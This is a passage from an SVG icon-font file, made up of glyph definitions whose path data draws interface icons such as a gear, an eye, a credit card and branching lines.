t-36.5 88.5t36.5 88.5t88.5 36.5z" />
    <glyph glyph-name="glyph81" unicode="&#xe050;" horiz-adv-x="575" 
d="M200 69q-4 16 -19 25t-32 4l-61 -18q-17 -5 -35 2.5t-26 22.5l-21 36q-8 15 -5 34t15 31l45 44q12 12 12 29t-12 29l-45 44q-13 12 -15 31t6 34l20 37q8 15 26 22t35 2l61 -17q17 -5 32 4t19 25l15 61q5 17 20 29t32 12h41q17 0 32 -12t20 -29l16 -61q5 -17 19.5 -25
t30.5 -4l61 17q17 5 35 -2t26 -22l21 -37q8 -15 5 -34t-15 -31l-45 -44q-13 -12 -12.5 -29t12.5 -29l45 -44q12 -12 15 -31t-5 -34l-21 -36q-8 -15 -26 -22.5t-35 -2.5l-61 18q-16 4 -30.5 -4t-19.5 -25l-16 -62q-5 -17 -20 -28.5t-32 -11.5h-41q-17 0 -32 11.5t-20 28.5z
M288 362q-35 0 -59.5 -24.5t-24.5 -58.5t24.5 -58.5t59.5 -24.5q34 0 58.5 24t24.5 59t-24.5 59t-58.5 24z" />
    <glyph glyph-name="glyph82" unicode="&#xe051;" 
d="M375 592q-121 0 -206.5 -85.5t-85.5 -206.5t85.5 -206.5t206.5 -85.5t206.5 85.5t85.5 206.5t-85.5 206.5t-206.5 85.5zM375 675q155 0 265 -110t110 -265t-110 -265t-265 -110t-265 110t-110 265t110 265t265 110zM529 480q11 3 20 -6t6 -20l-72 -248q-3 -11 -14 -14
l-248 -72h-5q-10 0 -17 8t-4 18l72 248q3 11 14 14zM246 171l201 57l-144 144z" />
    <glyph glyph-name="glyph83" unicode="&#xe052;" horiz-adv-x="792" 
d="M667 675q52 0 88.5 -36.5t36.5 -88.5v-500q0 -52 -36.5 -88.5t-88.5 -36.5h-459q-52 0 -88.5 36.5t-36.5 88.5v42h-41q-17 0 -29.5 12t-12.5 29t12.5 29.5t29.5 12.5h41v83h-41q-17 0 -29.5 12.5t-12.5 29.5t12.5 29.5t29.5 12.5h41v83h-41q-17 0 -29.5 12.5t-12.5 29.5
t12.5 29t29.5 12h41v42q0 52 36.5 88.5t88.5 36.5h459zM167 550v-42h41v84q-17 0 -29 -12.5t-12 -29.5zM167 425v-83h41v83h-41zM167 258v-83h41v83h-41zM167 50q0 -17 12 -29.5t29 -12.5v84h-41v-42zM708 50v500q0 17 -12 29.5t-29 12.5h-417v-584h417q17 0 29 12.5
t12 29.5zM375 362q0 84 83 84q84 0 84 -84q0 -83 -84 -83q-83 0 -83 83zM458 244q45 0 74.5 -18t29.5 -42q0 -12 -30 -21t-74 -9q-47 0 -75.5 9t-28.5 21q0 24 28.5 42t75.5 18z" />
    <glyph glyph-name="glyph84" unicode="&#xe053;" horiz-adv-x="708" 
d="M583 508q52 0 88.5 -36.5t36.5 -88.5v-291q0 -52 -36.5 -88.5t-88.5 -36.5h-458q-52 0 -88.5 36.5t-36.5 88.5v291q0 52 36.5 88.5t88.5 36.5h458zM625 92v166h-542v-166q0 -17 12.5 -29.5t29.5 -12.5h458q17 0 29.5 12.5t12.5 29.5zM625 342v41q0 17 -12.5 29.5
t-29.5 12.5h-458q-17 0 -29.5 -12.5t-12.5 -29.5v-41h542zM458 133q-20 0 -20 21t20 21h84q20 0 20 -21t-20 -21h-84z" />
    <glyph glyph-name="glyph85" unicode="&#xe055;" 
d="M112 658h638l-58 -304q-1 -8 -54 -292l-342 -120l-296 120l29 159h125l-12 -67l179 -71l208 71l29 150h-512l25 134h512l17 87h-512z" />
    <glyph glyph-name="glyph86" unicode="&#xe056;" horiz-adv-x="583" 
d="M583 434v-4v-260q0 -121 -85 -206.5t-206 -85.5t-206.5 85.5t-85.5 206.5v260l1 4q5 116 89.5 196.5t201.5 80.5t201.5 -80.5t89.5 -196.5zM292 66q68 0 124.5 37t83.5 97v16q-86 -88 -208 -88q-123 0 -209 88v-16q27 -60 84 -97t125 -37zM292 628q-86 0 -147.5 -61
t-61.5 -147t61.5 -147.5t147.5 -61.5t147 61.5t61 147.5t-61 147t-147 61zM292 -39q70 0 125 42.5t74 108.5q-81 -88 -199 -88t-199 88q19 -66 74 -108.5t125 -42.5z" />
    <glyph glyph-name="glyph87" unicode="&#xe057;" 
d="M375 675q155 0 265 -110t110 -265t-110 -265t-265 -110t-265 110t-110 265t110 265t265 110zM375 8q121 0 206.5 85.5t85.5 206.5t-85.5 206.5t-206.5 85.5t-206.5 -85.5t-85.5 -206.5t85.5 -206.5t206.5 -85.5zM404 300l111 -110q10 -10 4 -23t-19 -13q-9 0 -15 6
l-110 111l-110 -111q-6 -6 -15 -6q-13 0 -19 13t4 23l111 110l-111 110q-14 14 1 29t29 1l110 -111l110 111q14 14 29 -1t1 -29z" />
    <glyph glyph-name="glyph88" unicode="&#xe058;" horiz-adv-x="667" 
d="M333 633q138 0 236 -97.5t98 -235.5t-98 -235.5t-236 -97.5t-235.5 97.5t-97.5 235.5t97.5 235.5t235.5 97.5zM488 204l-96 96l96 96q12 12 12 29t-12 29t-29.5 12t-29.5 -12l-96 -95l-95 95q-12 12 -29.5 12t-29.5 -12t-12 -29t12 -29l95 -96l-95 -96q-12 -12 -12 -29
t12 -29q13 -13 29 -13q17 0 30 13l95 95l96 -95q13 -13 29 -13q17 0 30 13q12 12 12 29t-12 29z" />
    <glyph glyph-name="glyph89" unicode="&#xe059;" horiz-adv-x="1000" 
d="M875 758q52 0 88.5 -36.5t36.5 -88.5v-458q0 -52 -36.5 -88.5t-88.5 -36.5h-250v-83h125q17 0 29.5 -12.5t12.5 -29.5t-12.5 -29.5t-29.5 -12.5h-500q-17 0 -29.5 12.5t-12.5 29.5t12.5 29.5t29.5 12.5h125v83h-250q-52 0 -88.5 36.5t-36.5 88.5v458q0 52 36.5 88.5
t88.5 36.5h750zM583 -33v83h-166v-83h166zM917 175v458q0 17 -12.5 29.5t-29.5 12.5h-750q-17 0 -29.5 -12.5t-12.5 -29.5v-458q0 -17 12.5 -29.5t29.5 -12.5h750q17 0 29.5 12.5t12.5 29.5zM833 633q17 0 29.5 -12t12.5 -29v-334q0 -17 -12.5 -29t-29.5 -12h-666
q-17 0 -29.5 12t-12.5 29v334q0 17 12.5 29t29.5 12h666zM833 258v334h-666v-334h666z" />
    <glyph glyph-name="glyph90" unicode="&#xe05a;" horiz-adv-x="1000" 
d="M916 131q36 -8 60 -36.5t24 -65.5q0 -43 -30.5 -73.5t-73.5 -30.5h-792q-43 0 -73.5 30.5t-30.5 73.5q0 37 24 65.5t60 36.5q0 6 -0.5 21t-0.5 23v375q0 52 36.5 88.5t88.5 36.5h584q52 0 88.5 -36.5t36.5 -88.5v-375q0 -8 -0.5 -23t-0.5 -21zM167 550v-375q0 -9 0.5 -23
t0.5 -19h40v375q0 17 12.5 29.5t29.5 12.5h500q17 0 29.5 -12.5t12.5 -29.5v-375h41v42v375q0 17 -12 29.5t-29 12.5h-584q-17 0 -29 -12.5t-12 -29.5zM750 133v375h-500v-375h500zM896 8q8 0 14.5 6.5t6.5 14.5t-6.5 14.5t-14.5 6.5h-792q-8 0 -14.5 -6.5t-6.5 -14.5
t6.5 -14.5t14.5 -6.5h792z" />
    <glyph glyph-name="glyph91" unicode="&#xe05b;" horiz-adv-x="542" 
d="M417 675q52 0 88.5 -36.5t36.5 -88.5v-500q0 -52 -36.5 -88.5t-88.5 -36.5h-292q-52 0 -88.5 36.5t-36.5 88.5v500q0 52 36.5 88.5t88.5 36.5h292zM458 50v500q0 17 -12 29.5t-29 12.5h-292q-17 0 -29.5 -12.5t-12.5 -29.5v-500q0 -17 12.5 -29.5t29.5 -12.5h292
q17 0 29 12.5t12 29.5zM375 550q17 0 29.5 -12.5t12.5 -29.5v-375q0 -17 -12.5 -29t-29.5 -12h-63q0 -17 -12 -29.5t-29 -12.5t-29.5 12.5t-12.5 29.5h-62q-17 0 -29.5 12t-12.5 29v375q0 17 12.5 29.5t29.5 12.5h208zM375 133v375h-208v-375h208z" />
    <glyph glyph-name="glyph92" unicode="&#xe05c;" horiz-adv-x="708" 
d="M542 633q17 0 29 -12t12 -29v-500q0 -17 -12 -29.5t-29 -12.5h-146q0 -17 -12.5 -29.5t-29.5 -12.5t-29.5 12.5t-12.5 29.5h-145q-17 0 -29.5 12.5t-12.5 29.5v500q0 17 12.5 29t29.5 12h375zM542 92v500h-375v-500h375zM583 758q52 0 88.5 -36.5t36.5 -88.5v-625
q0 -52 -36.5 -88.5t-88.5 -36.5h-458q-52 0 -88.5 36.5t-36.5 88.5v625q0 52 36.5 88.5t88.5 36.5h458zM625 8v625q0 17 -12.5 29.5t-29.5 12.5h-458q-17 0 -29.5 -12.5t-12.5 -29.5v-625q0 -17 12.5 -29t29.5 -12h458q17 0 29.5 12t12.5 29z" />
    <glyph glyph-name="glyph93" unicode="&#xe05d;" horiz-adv-x="746" 
d="M746 404l-114 -108l-3 -3q38 -43 38 -97q0 -60 -43 -103t-103 -43h-113l-33 -167h-42l-33 167h-92q-55 0 -94 39l-107 107l77 77q-38 17 -61 52.5t-23 78.5q0 60 43 103t103 43h146v21q0 25 18 43.5t44 18.5t44.5 -18.5t18.5 -43.5v-21h121q54 0 93 -37zM521 133
q25 0 43.5 18.5t18.5 44.5t-18.5 44t-43.5 18h-313q-21 0 -35 -14l-48 -48l48 -48q15 -15 35 -15h313zM574 356l51 48l-51 48q-15 15 -36 15h-392q-26 0 -44.5 -18.5t-18.5 -44.5q0 -25 18.5 -43.5t44.5 -18.5h392q22 0 36 14z" />
    <glyph glyph-name="glyph94" unicode="&#xe05e;" 
d="M375 446q-52 0 -88.5 36.5t-36.5 88.5t36.5 88.5t88.5 36.5t88.5 -36.5t36.5 -88.5t-36.5 -88.5t-88.5 -36.5zM375 612q-17 0 -29.5 -12t-12.5 -29t12.5 -29.5t29.5 -12.5t29.5 12.5t12.5 29.5t-12.5 29t-29.5 12zM375 -96q-52 0 -88.5 36.5t-36.5 88.5t36.5 88.5
t88.5 36.5t88.5 -36.5t36.5 -88.5t-36.5 -88.5t-88.5 -36.5zM375 71q-17 0 -29.5 -12.5t-12.5 -29.5t12.5 -29t29.5 -12t29.5 12t12.5 29t-12.5 29.5t-29.5 12.5zM625 175h-500q-52 0 -88.5 36.5t-36.5 88.5t36.5 88.5t88.5 36.5h500q52 0 88.5 -36.5t36.5 -88.5
t-36.5 -88.5t-88.5 -36.5zM125 342q-17 0 -29.5 -12.5t-12.5 -29.5t12.5 -29.5t29.5 -12.5h500q17 0 29.5 12.5t12.5 29.5t-12.5 29.5t-29.5 12.5h-500z" />
    <glyph glyph-name="glyph95" unicode="&#xe05f;" horiz-adv-x="667" 
d="M240 550q0 94 93 94q94 0 94 -94t-94 -94q-93 0 -93 94zM240 50q0 94 93 94q94 0 94 -94t-94 -94q-93 0 -93 94zM0 300q0 34 24 58.5t59 24.5h500q35 0 59.5 -24.5t24.5 -58.5t-24.5 -58.5t-59.5 -24.5h-500q-35 0 -59 24.5t-24 58.5z" />
    <glyph glyph-name="glyph96" unicode="&#xe060;" horiz-adv-x="667" 
d="M458 300q17 0 29.5 -12.5t12.5 -29.5t-12.5 -29t-29.5 -12h-83v-84q0 -17 -12.5 -29t-29.5 -12t-29 12t-12 29v84h-84q-17 0 -29 12t-12 29t12 29.5t29 12.5h84v83q0 17 12 29.5t29 12.5t29.5 -12.5t12.5 -29.5v-83h83zM654 496q13 -13 13 -29v-417q0 -52 -36.5 -88.5
t-88.5 -36.5h-417q-52 0 -88.5 36.5t-36.5 88.5v500q0 52 36.5 88.5t88.5 36.5h333q18 0 30 -12zM566 467l-108 107v-45q0 -25 18.5 -43.5t44.5 -18.5h45zM542 8q17 0 29 12.5t12 29.5v375h-62q-43 0 -73.5 30.5t-30.5 73.5v63h-292q-17 0 -29.5 -12.5t-12.5 -29.5v-500
q0 -17 12.5 -29.5t29.5 -12.5h417z" />
    <glyph glyph-name="glyph97" unicode="&#xe061;" horiz-adv-x="667" 
d="M654 496q13 -13 13 -29v-417q0 -52 -36.5 -88.5t-88.5 -36.5h-417q-52 0 -88.5 36.5t-36.5 88.5v500q0 52 36.5 88.5t88.5 36.5h333q18 0 30 -12zM566 467l-108 107v-45q0 -25 18.5 -43.5t44.5 -18.5h45zM542 8q17 0 29 12.5t12 29.5v375h-62q-43 0 -73.5 30.5
t-30.5 73.5v63h-292q-17 0 -29.5 -12.5t-12.5 -29.5v-500q0 -17 12.5 -29.5t29.5 -12.5h417zM458 217h-250q-17 0 -29 12t-12 29t12 29.5t29 12.5h250q17 0 29.5 -12.5t12.5 -29.5t-12.5 -29t-29.5 -12z" />
    <glyph glyph-name="glyph98" unicode="&#xe062;" horiz-adv-x="667" 
d="M542 -75h-417q-52 0 -88.5 36.5t-36.5 88.5v500q0 52 36.5 88.5t88.5 36.5h417q52 0 88.5 -36.5t36.5 -88.5v-500q0 -52 -36.5 -88.5t-88.5 -36.5zM125 592q-17 0 -29.5 -12.5t-12.5 -29.5v-500q0 -17 12.5 -29.5t29.5 -12.5h417q17 0 29 12.5t12 29.5v500q0 17 -12 29.5
t-29 12.5h-417zM500 342h-333q-21 0 -21 20q0 9 6 15t15 6h333q9 0 15 -6t6 -15q0 -20 -21 -20zM500 467h-333q-9 0 -15 6t-6 15q0 20 21 20h333q21 0 21 -20q0 -9 -6 -15t-15 -6zM500 217h-333q-9 0 -15 6t-6 15q0 20 21 20h333q21 0 21 -20q0 -9 -6 -15t-15 -6zM500 92
h-333q-21 0 -21 20q0 9 6 15t15 6h333q9 0 15 -6t6 -15q0 -20 -21 -20z" />
    <glyph glyph-name="glyph99" unicode="&#xe063;" horiz-adv-x="667" 
d="M654 496q13 -13 13 -29v-417q0 -52 -36.5 -88.5t-88.5 -36.5h-417q-52 0 -88.5 36.5t-36.5 88.5v500q0 52 36.5 88.5t88.5 36.5h333q18 0 30 -12zM566 467l-108 107v-45q0 -25 18.5 -43.5t44.5 -18.5h45zM542 8q17 0 29 12.5t12 29.5v375h-62q-43 0 -73.5 30.5
t-30.5 73.5v63h-292q-17 0 -29.5 -12.5t-12.5 -29.5v-500q0 -17 12.5 -29.5t29.5 -12.5h417z" />
    <glyph glyph-name="glyph100" unicode="&#xe064;" 
d="M749 92l1 -209q0 -17 -12.5 -29t-29.5 -12h-666q-17 0 -29.5 12t-12.5 29q0 209 1 209q0 9 1 13l84 250q10 28 39 28h23l-28 29q-37 37 -37 88t37 88q25 25 61 33t69 -3v57q0 52 36.5 88.5t88.5 36.5t88.5 -36.5t36.5 -88.5v-57q33 11 69 3t61 -33q37 -37 37 -88t-37 -88
l-28 -29h23q29 0 39 -28l84 -250q1 -4 1 -13zM179 529q-12 -12 -12 -29.5t12 -29.5l196 -195l196 196q12 12 12 29t-12 29t-29.5 12t-29.5 -12l-95 -95v241q0 17 -12.5 29.5t-29.5 12.5t-29.5 -12.5t-12.5 -29.5v-241l-95 95q-13 13 -30 13q-16 0 -29 -13zM155 300l-69 -208
h579l-70 208h-77l-143 -142l-143 142h-77zM667 -75v125h-584v-125h584z" />
    <glyph glyph-name="glyph101" unicode="&#xe065;" 
d="M571 492q12 -12 12 -29.5t-12 -29.5l-196 -195l-196 195q-12 12 -12 29.5t12 29.5t29 12q18 0 30 -12l95 -96v279q0 17 12.5 29.5t29.5 12.5t29.5 -12.5t12.5 -29.5v-279l95 96q11 11 30 11q18 0 29 -11zM749 133l1 -208q0 -17 -12.5 -29.5t-29.5 -12.5h-666
q-17 0 -29.5 12.5t-12.5 29.5q0 208 1 208q0 9 1 13l84 250q10 29 39 29h9q7 -14 15 -22l62 -61h-56l-69 -209h578l-69 209h-56l62 61q8 8 15 22h9q29 0 39 -29l84 -250q1 -4 1 -13z" />
    <glyph glyph-name="glyph102" unicode="&#xe066;" 
d="M0 262l154 121l221 -137l-154 -129zM221 650l154 -129l-221 -138l-154 121zM750 504l-154 -121l-221 138l154 129zM375 246l221 137l154 -121l-221 -145zM375 196l154 -129l67 45v-50l-221 -133l-221 133v50l67 -45z" />
    <glyph glyph-name="glyph103" unicode="&#xe067;" horiz-adv-x="792" 
d="M773 578q19 -19 19 -44t-19 -44l-148 -148v-375q0 -17 -12.5 -29.5t-29.5 -12.5h-541q-17 0 -29.5 12.5t-12.5 29.5v541q0 17 12.5 29.5t29.5 12.5h375l148 148q19 19 44 19t44 -19zM354 189l262 262l-90 90l-262 -262zM247 244l3 -69l71 -3zM542 8v250l-133 -128
q-16 -16 -50.5 -27t-64.5 -11h-127v127q0 33 9 66t25 49l132 133h-250v-459h459zM646 480l54 54l-91 91l-54 -54z" />
    <glyph glyph-name="glyph104" unicode="&#xe068;" horiz-adv-x="706" 
d="M500 444q91 -27 148.5 -101.5t57.5 -172.5q0 -120 -86.5 -203.5t-208.5 -83.5q-98 0 -176.5 59t-106.5 150h-45q-35 0 -59 24t-24 59v417h417q34 0 58.5 -24.5t24.5 -59.5v-64zM167 366l200 -200q12 -12 29 -12q18 0 30 12t12 29.5t-12 29.5l-200 200h135q17 0 29 12.5
t12 29.5t-12 29t-29 12h-278v-277q0 -17 12.5 -29.5t29.5 -12.5t29.5 12.5t12.5 29.5v135zM417 -35q86 0 147 60.5t61 146.5t-61 146t-147 60q-30 0 -69 -16l107 -107q25 -25 25 -59.5t-25 -58.5q-25 -25 -59 -25t-59 25l-120 120q-9 -25 -9 -83q0 -86 61.5 -147.5
t147.5 -61.5z" />
    <glyph glyph-name="glyph105" unicode="&#xe069;" horiz-adv-x="646" 
d="M375 71q77 0 132 55t55 132t-55 132.5t-132 55.5q-17 0 -29.5 12.5t-12.5 29.5t12.5 29t29.5 12q112 0 191.5 -79.5t79.5 -191.5t-79.5 -191t-191.5 -79t-191.5 79t-79.5 191q0 17 12.5 29.5t29.5 12.5t29.5 -12.5t12.5 -29.5q0 -77 55 -132t132 -55zM277 633
q17 0 29.5 -12t12.5 -29t-12.5 -29.5t-29.5 -12.5h-135l242 -242q12 -12 12 -29.5t-12 -29.5t-30 -12q-17 0 -29 12l-242 242v-135q0 -17 -12 -29.5t-29 -12.5t-29.5 12.5t-12.5 29.5v277h277v0z" />
    <glyph glyph-name="glyph106" unicode="&#xe06a;" 
d="M625 300h-500q-52 0 -88.5 36.5t-36.5 88.5t36.5 88.5t88.5 36.5h500q52 0 88.5 -36.5t36.5 -88.5t-36.5 -88.5t-88.5 -36.5zM125 467q-17 0 -29.5 -12.5t-12.5 -29.5t12.5 -29.5t29.5 -12.5h500q17 0 29.5 12.5t12.5 29.5t-12.5 29.5t-29.5 12.5h-500zM625 8h-500
q-52 0 -88.5 36.5t-36.5 88.5t36.5 88.5t88.5 36.5h500q52 0 88.5 -36.5t36.5 -88.5t-36.5 -88.5t-88.5 -36.5zM125 175q-17 0 -29.5 -12.5t-12.5 -29.5t12.5 -29t29.5 -12h500q17 0 29.5 12t12.5 29t-12.5 29.5t-29.5 12.5h-500z" />
    <glyph glyph-name="glyph107" unicode="&#xe06b;" horiz-adv-x="667" 
d="M583 508q35 0 59.5 -24.5t24.5 -58.5t-24.5 -58.5t-59.5 -24.5h-500q-35 0 -59 24t-24 59t24 59t59 24h500zM583 217q35 0 59.5 -24.5t24.5 -59.5q0 -34 -24.5 -58.5t-59.5 -24.5h-500q-35 0 -59 24t-24 59t24.5 59.5t58.5 24.5h500z" />
    <glyph glyph-name="glyph108" unicode="&#xe06c;" horiz-adv-x="792" 
d="M780 392q12 -12 12 -29.5t-12 -29.5q-53 -53 -113 -114v-252q0 -17 -12.5 -29.5t-29.5 -12.5h-583q-17 0 -29.5 12.5t-12.5 29.5v583q0 17 12.5 29.5t29.5 12.5h333q0 34 26 58.5t63 24.5t66 -27q96 -102 250 -256zM470 136q205 210 221 226q-141 143 -220 228l-7 2
l-6 -2v-165h-41q-38 0 -69 -13t-52 -33t-37 -48.5t-25 -55.5t-15 -57q90 81 198 82h41v-165l6 -2zM83 8h500v185q-49 -49 -82 -85q-14 -16 -37 -16q-20 0 -33.5 12t-13.5 29v125q-143 -3 -250 -166v20q0 48 7 95t25.5 95t45.5 84t71.5 58.5t100.5 22.5v41h-334v-500z" />
    <glyph glyph-name="glyph109" unicode="&#xe06d;" 
d="M167 112q0 48 7 95t25.5 95t45.5 84t71.5 58.5t100.5 22.5v125q0 17 13.5 29t33.5 12q22 0 37 -15l249 -256q-168 -169 -249 -254q-14 -16 -37 -16q-20 0 -33.5 12t-13.5 29v125q-143 -3 -250 -166v20zM42 -75q-17 0 -29.5 12.5t-12.5 29.5v583q0 17 12.5 29.5t29.5 12.5
h333v-84h-292v-500h500v125q52 54 84 86v-252q0 -17 -12.5 -29.5t-29.5 -12.5h-583z" />
    <glyph glyph-name="glyph110" unicode="&#xe06e;" 
d="M375 425q-78 0 -137 -42q-62 -44 -132 -125q68 -79 132 -124q59 -42 137 -42t137 42q64 45 132 124q-70 81 -132 125q-59 42 -137 42zM375 508q106 0 185 -57q48 -34 95.5 -82.5t70.5 -79.5l24 -31q-9 -13 -25.5 -34.5t-66.5 -73t-98 -85.5q-79 -57 -185 -57
q-107 0 -186 57q-48 34 -95.5 82.5t-70.5 79.5l-23 31q9 13 25.5 34.5t66 73t97.5 85.5q79 57 186 57zM375 300q17 0 29.5 -12.5t12.5 -29.5t-12.5 -29t-29.5 -12t-29.5 12t-12.5 29t12.5 29.5t29.5 12.5zM375 133q-52 0 -88.5 36.5t-36.5 88.5t36.5 88.5t88.5 36.5
t88.5 -36.5t36.5 -88.5t-36.5 -88.5t-88.5 -36.5zM375 342q-34 0 -58.5 -24.5t-24.5 -59.5q0 -34 24 -58.5t59 -24.5t59 24.5t24 58.5q0 35 -24.5 59.5t-58.5 24.5z" />
    <glyph glyph-name="glyph111" unicode="&#xe06f;" horiz-adv-x="833" 
d="M826 282q17 -23 0 -47q-6 -9 -27.5 -37t-71.5 -79.5t-101 -87.5q-90 -64 -209 -64q-120 0 -210 64q-51 36 -101 87.5t-71.5 79.5t-27.5 37q-17 23 0 47q5 9 27 37t72 79t101 87q91 65 210 65q118 0 209 -65q51 -36 101 -87t72 -79t27 -37zM417 112q60 0 102.5 43
t42.5 103q0 61 -42.5 103.5t-102.5 42.5q-61 0 -103.5 -42.5t-42.5 -103.5q0 -60 42.5 -103t103.5 -43zM500 258q0 -34 -24 -58.5t-59 -24.5t-59.5 24.5t-24.5 58.5t24.5 59t59.5 25q34 0 58.5 -24.5t24.5 -59.5z" />
    <glyph glyph-name="glyph112" unicode="&#xe070;" horiz-adv-x="708" 
d="M362 758q151 -28 248.5 -145.5t97.5 -270.5q0 -144 -87 -257.5t-225 -150.5v-51q0 -17 -12.5 -29t-29.5 -12t-29.5 12t-12.5 29v51q-138 37 -225 150.5t-87 257.5q0 153 98 270.5t249 145.5l7 1zM396 21q100 35 163 120t66 192l-131 -131q-6 -6 -15 -6q-13 0 -19 12t4 23
l157 157q-9 61 -36 113l-91 -91q-6 -6 -15 -6q-13 0 -19 13t4 23l98 98q-77 109 -208 136q-131 -27 -208 -136l98 -98q10 -10 4 -23t-19 -13q-9 0 -15 6l-91 91q-27 -52 -36 -113l157 -157q10 -11 4 -23t-19 -12q-9 0 -15 6l-130 131q3 -107 65.5 -192t162.5 -120v487
q0 17 12.5 29.5t29.5 12.5t29.5 -12.5t12.5 -29.5v-487z" />
    <glyph glyph-name="glyph113" unicode="&#xe071;" horiz-adv-x="667" 
d="M167 467h333v-292h-333v292zM458 217v208h-250v-208h250zM542 717q52 0 88.5 -36.5t36.5 -88.5v-542q0 -52 -36.5 -88.5t-88.5 -36.5h-125v83h-167v-83h-125q-52 0 -88.5 36.5t-36.5 88.5v542q0 52 36.5 88.5t88.5 36.5h125v-84h167v84h125zM583 550v42q0 17 -12 29
t-29 12h-42v-83h-333v83h-42q-17 0 -29.5 -12t-12.5 -29v-42q17 0 29.5 -12.5t12.5 -29.5t-12.5 -29t-29.5 -12v-42q17 0 29.5 -12.5t12.5 -29.5t-12.5 -29t-29.5 -12v-42q17 0 29.5 -12.5t12.5 -29.5t-12.5 -29t-29.5 -12v-42q17 0 29.5 -12.5t12.5 -29.5t-12.5 -29
t-29.5 -12v-42q0 -17 12.5 -29.5t29.5 -12.5h42v84h333v-84h42q17 0 29 12.5t12 29.5v42q-17 0 -29 12t-12 29t12 29.5t29 12.5v42q-17 0 -29 12t-12 29t12 29.5t29 12.5v42q-17 0 -29 12t-12 29t12 29.5t29 12.5v42q-17 0 -29 12t-12 29t12 29.5t29 12.5z" />
    <glyph glyph-name="glyph114" unicode="&#xe072;" horiz-adv-x="671" 
d="M627 550q35 0 42.5 -16.5t-17.5 -41.5l-175 -175q-24 -24 -41 -60t-17 -61v-146l-167 -83v208q0 35 -16.5 76t-41.5 66l-175 175q-25 25 -17.5 41.5t42.5 16.5h583z" />
    <glyph glyph-name="glyph115" unicode="&#xe073;" horiz-adv-x="583" 
d="M512 611q20 20 45.5 8.5t25.5 -37.5v-334q0 -17 -12 -29q-64 -64 -154.5 -64t-154.5 64q-37 37 -88 40t-91 -29v-190q0 -17 -12 -29.5t-29 -12.5t-29.5 12.5t-12.5 29.5v542q0 17 12 29q64 64 154.5 64t154.5 -64q40 -40 95.5 -40t95.5 40zM262 552q-37 37 -88 40
t-91 -29v-95q54 26 116.5 16t106.5 -54q39 -39 94 -45t100 23v97q-58 -25 -124.5 -12.5t-113.5 59.5zM321 278q37 -37 88 -40t91 29v95q-43 -20 -83 -20q-80 0 -140 58q-39 39 -94 44.5t-100 -23.5v-96q42 17 84 17q90 0 154 -64z" />
    <glyph glyph-name="glyph116" unicode="&#xe074;" horiz-adv-x="583" 
d="M512 611q20 20 45.5 8.5t25.5 -37.5v-334q0 -17 -12 -29q-64 -64 -154.5 -64t-154.5 64q-37 37 -88 40t-91 -29v-190q0 -17 -12 -29.5t-29 -12.5t-29.5 12.5t-12.5 29.5v542q0 17 12 29q64 64 154.5 64t154.5 -64q40 -40 95.5 -40t95.5 40z" />
    <glyph glyph-name="glyph117" unicode="&#xe075;" horiz-adv-x="583" 
d="M396 633zM396 633l-313 -295l209 -121l-104 -250l312 296l-208 120zM396 717q34 0 58.5 -24.5t24.5 -59.5q0 -17 -8 -35l-74 -179l145 -84q35 -20 40.5 -61.5t-25.5 -71.5l-312 -296q-25 -23 -58 -23q-45 0 -69 38t-7 78l76 182l-145 84q-35 20 -41 61t25 72l312 296
q25 23 58 23z" />
    <glyph glyph-name="glyph118" unicode="&#xe076;" horiz-adv-x="500" 
d="M479 299q18 -10 20.5 -31t-12.5 -36l-313 -296q-11 -11 -28 -11q-22 0 -34.5 19t-4.5 39l90 216l-176 102q-17 10 -20 31t12 36l313 296q13 11 28 11q17 0 29.5 -12.5t12.5 -29.5q0 -10 -4 -18l-89 -214z" />
    <glyph glyph-name="glyph119" unicode="&#xe077;" horiz-adv-x="667" 
d="M542 133q52 0 88.5 -36.5t36.5 -88.5t-36.5 -88.5t-88.5 -36.5q-40 0 -72.5 23.5t-45.5 60.5h-132q-86 0 -147.5 61t-61.5 147v299q-36 13 -59.5 45.5t-23.5 72.5q0 52 36.5 88.5t88.5 36.5t88.5 -36.5t36.5 -88.5q0 -40 -23.5 -72.5t-59.5 -45.5v-7q0 -52 36.5 -88.5
t88.5 -36.5h132q13 36 45.5 59.5t72.5 23.5q52 0 88.5 -36.5t36.5 -88.5t-36.5 -88.5t-88.5 -36.5q-40 0 -72.5 23.5t-45.5 59.5h-132q-67 0 -125 43v-126q0 -52 36.5 -88.5t88.5 -36.5h132q13 36 45.5 59.5t72.5 23.5zM542 342q-17 0 -29.5 -12.5t-12.5 -29.5t12.5 -29.5
t29.5 -12.5t29 12.5t12 29.5t-12 29.5t-29 12.5zM125 633q-17 0 -29.5 -12t-12.5 -29t12.5 -29.5t29.5 -12.5t29.5 12.5t12.5 29.5t-12.5 29t-29.5 12zM542 -33q17 0 29 12t12 29t-12 29.5t-29 12.5t-29.5 -12.5t-12.5 -29.5t12.5 -29t29.5 -12z" />
    <glyph glyph-name="glyph120" unicode="&#xe078;" horiz-adv-x="667" 
d="M583 126q37 -13 60.5 -45.5t23.5 -72.5q0 -52 -36.5 -88.5t-88.5 -36.5t-88.5 36.5t-36.5 88.5q0 40 23.5 72.5t59.5 45.5v77q0 25 -18 43.5t-44 18.5q-63 0 -105 44q-42 -44 -104 -44q-25 0 -43.5 -18.5t-18.5 -43.5v-77q36 -13 59.5 -45.5t23.5 -72.5
q0 -52 -36.5 -88.5t-88.5 -36.5t-88.5 36.5t-36.5 88.5q0 40 23.5 72.5t59.5 45.5v77q0 60 43 103t103 43q26 0 44.5 18.5t18.5 43.5v63q-37 13 -60.5 45.5t-23.5 72.5q0 52 36.5 88.5t88.5 36.5t88.5 -36.5t36.5 -88.5q0 -40 -23.5 -72.5t-59.5 -45.5v-63q0 -25 18.5 -43.5
t44.5 -18.5q60 0 102.5 -43t42.5 -103v-77zM125 -33q17 0 29.5 12t12.5 29t-12.5 29.5t-29.5 12.5t-29.5 -12.5t-12.5 -29.5t12.5 -29t29.5 -12zM333 633q-17 0 -29 -12t-12 -29t12 -29.5t29 -12.5t29.5 12.5t12.5 29.5t-12.5 29t-29.5 12zM542 -33q17 0 29 12t12 29
t-12 29.5t-29 12.5t-29.5 -12.5t-12.5 -29.5t12.5 -29t29.5 -12z" />
    <glyph glyph-name="glyph121" unicode="&#xe079;" horiz-adv-x="667" 
d="M583 126q37 -13 60.5 -45.5t23.5 -72.5q0 -52 -36.5 -88.5t-88.5 -36.5t-88.5 36.5t-36.5 88.5q0 40 23.5 72.5t59.5 45.5v348q-36 13 -59.5 45.5t-23.5 72.5q0 52 36.5 88.5t88.5 36.5t88.5 -36.5t36.5 -88.5q0 -40 -23.5 -72.5t-60.5 -45.5v-348zM542 633
